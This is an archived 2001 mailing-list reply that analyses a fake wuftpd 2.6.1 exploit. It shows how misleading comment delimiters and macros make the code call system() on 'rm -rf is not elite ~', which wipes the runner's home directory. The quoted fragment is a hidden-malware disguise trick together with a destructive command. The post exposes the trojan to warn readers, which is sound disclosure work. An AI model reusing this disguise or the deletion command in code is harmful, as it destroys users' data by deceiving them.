Re[2]: wuftpd 2.6.1 advisory/exploit

• Previous message: Bernhard Rosenkraenzer: "Re: wuftpd 2.6.1 advisory/exploit"
• In reply to: Blue Boar: "Re: wuftpd 2.6.1 advisory/exploit"
• Next in thread: Matias Sedalo: "Re: wuftpd 2.6.1 advisory/exploit"
• Next in thread: Pedro Miller Rabinovitch: "WARNING! Fake exploit (was: wuftpd 2.6.1 advisory/exploit)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello,

Yes, the trick is here:

//#define POTS 12                       /* fill these in for your
#define DEF_ALGN 1                       * target system  
//#define HEAP_ADDR 0x41414141           */ 
...
#define target (unsigned long)
...
unsigned long arg_addr = ADDR, align = DEF_ALGN,

After preprocessing the code looks like

unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system;

Then puts' address is being replaced by system's or something like
that and then puts("rm -rf is not elite ~"); does the main trick :)
Hint: ~ means your home directory.


Wednesday, September 19, 2001, 6:38:14 PM, you wrote:

BB> Hey, I'm told that this exploit like eats your hard drive or something.
BB> Caveat emptor and all, but I figured since I actually heard about this,
BB> I'd let you know.  I guess it's a spoofed note.

BB>                                         BB


--
Best regards,
Alexander
ISP Alkar Teleport
tel/fax +380 562 340044
mailto:miziat_private
http://abn.com.ua
http://ufa.com.ua

• Next message: |Zan: "[DeepZone black tool] NT/2k/XP portable shellcode generator updated!"
• Previous message: Bernhard Rosenkraenzer: "Re: wuftpd 2.6.1 advisory/exploit"
• In reply to: Blue Boar: "Re: wuftpd 2.6.1 advisory/exploit"
• Next in thread: Matias Sedalo: "Re: wuftpd 2.6.1 advisory/exploit"
• Next in thread: Pedro Miller Rabinovitch: "WARNING! Fake exploit (was: wuftpd 2.6.1 advisory/exploit)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Sep 20 2001 - 09:42:46 PDT